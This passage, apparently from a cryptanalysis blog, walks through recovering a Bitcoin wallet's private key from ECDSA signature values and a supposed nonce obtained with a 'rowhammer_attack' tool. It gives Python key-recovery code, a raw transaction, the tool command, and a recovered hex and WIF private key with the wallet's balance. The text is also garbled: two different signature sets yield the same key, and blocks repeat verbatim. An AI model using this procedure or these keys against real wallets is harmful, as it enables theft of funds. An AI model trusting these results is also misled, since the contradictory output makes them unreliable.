S = 0x0cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f65274340
Z = 0x6b709c60c5357b397ed916dd014b7ce92ead05508b173b45f20066d23c6720f6

R          =    0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
point2gen  =   (0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935 , 0xb05023fec1068addab6d25f08d358e6f25edd83094ac730dcb7124ef3f662af7)


K = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:18vXv21kk8PfN4KRX5i19QvDRM855qheQ

Let’s use  the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0xf8be8b1e7110c61a6904bb3eb3834c08ee1f18c56b6a04915e14306c1a8668be
R = 0xc5c2d551da92885687072c21288451cac237778ccad971dba929cedbb57fd935
S = 0x0cc3cfec36e8e9df751438ea3486d868f1ce6fb4b05540fe724b8e8f65274340
Z = 0x6b709c60c5357b397ed916dd014b7ce92ead05508b173b45f20066d23c6720f6

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

PrivKey = f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566

Let’s open bitaddress and check:

ADDR: 18vXv21kk8PfN4KRX5i19QvDRM855qheQ
WIF:  L5UYkyYNJDaJTrTZdgWUjPBx1EdgSCjoqxLdqgnQvmcAqMVZnQUh
HEX:  f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 683.49

The potential threat of losing BTC coins lies in the critical vulnerability of the Bitcoin blockchain transaction, so we strongly recommend that everyone always update the software and use only verified devices.

With detailed cryptanalysis, we also found a critical vulnerability in 15002f0dc4d2b3f747da8f24a2b994fd86d47db29f682204929c66d7bd52cd42 for the same Bitcoin Address TXID:

Prepare RawTX for the attack


How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
RawTX = 0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000

Now we need to get all R, S, Z values ​​from all vulnerable transactions

Let’s use the script

python2 0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
S = 0x5fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c71
Z = 0xed1d33e82c50d2e9567cee7c1bda9ebee64509fb0575bf144779f81dd1dbf42c

To get the secret key from a vulnerable ECDSA signing transaction, let’s add the data RawTXto a text document and save it as a fileRawTX.txt


Launch -tool rowhammer_attackusing software“ATTACKSAFE SOFTWARE”

./attacksafe -tool rowhammer_attack -open RawTX.txt -save SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

We launched this attack from -tool rowhammer_attackand the result was saved to a fileSecretKey.txt

Now to see the successful result, open the fileSecretKey.txt

cat SecretKey.txt
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)
Deployments ECDSA:

SecretKey = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d

RawTX = 0100000001b62152613231593ee2dc4b588240cc0ec67c4a20c9467a235781104b9da2e60c170000006a4730440220340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a02205fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c710121024feffc562717f5780235775c775d79b278d74dad2ec8032c4a138c6177693c99ffffffff0126020000000000001976a914274b3b849e8e46c918657bff191c2df0a1db8ba988ac00000000

We see an inscription "Deployments ECDSA"that means a critical vulnerability in the Bitcoin blockchain transaction.

SecretKey value in HEX format, this is our secret key "K" (NONCE):

K = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d

Let’s check with a Python

Let’s use the ECPy elliptic curve library :

Now let’s run the script by specifying secret key "K" (NONCE):

python3 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

(0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a , 0x86fe84a8fe36d81088a807db2ff8e7b810cf0104118c527bc06d36dd1688befd)

Checking the coordinates of a point EC (secp256k1) with a signature valueR

R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
S = 0x5fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c71
Z = 0xed1d33e82c50d2e9567cee7c1bda9ebee64509fb0575bf144779f81dd1dbf42c

R          =    0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
point2gen  =   (0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a , 0x86fe84a8fe36d81088a807db2ff8e7b810cf0104118c527bc06d36dd1688befd)


K = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d

Now knowing the secret key, we can get the private key to the Bitcoin Wallet:18vXv21kk8PfN4KRX5i19QvDRM855qheQ

Let’s use  the Python script: > > > Get the Private Key

Let’s open the code and add all the value of the signaturesK, R, S, Z

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

K = 0xc740256813f9d1db22418516a73adbe62dbe9ce20f0c2254c40d649d6d1acc4d
R = 0x340e28901b7b518b09b59cc30df0b03057b2a63e360495d391de2ea51f5b3b2a
S = 0x5fe8c05bfb82b89e534b027659ec0231b64b41397b48f5983bf461b9c2c72c71
Z = 0xed1d33e82c50d2e9567cee7c1bda9ebee64509fb0575bf144779f81dd1dbf42c

print (h((((S * K) - Z) * modinv(R,N)) % N))

The script will calculate the private key using the formula:

Privkey = ((((S * K) - Z) * modinv(R,N)) % N)

Let’s run the script:

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

PrivKey = f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566

Let’s open bitaddress and check:

ADDR: 18vXv21kk8PfN4KRX5i19QvDRM855qheQ
WIF:  L5UYkyYNJDaJTrTZdgWUjPBx1EdgSCjoqxLdqgnQvmcAqMVZnQUh
HEX:  f655071bf6c91cc8ce7ec7c7ece17e3aa6027762dd9c59bfd0889fd1817fb566
How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Private key Found!

How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

BALANCE: $ 683.49






How to Get a Private Key to a Bitcoin Wallet Using a Signature Fault (Rowhammer Attack on Bitcoin)

Crypto Deep Tech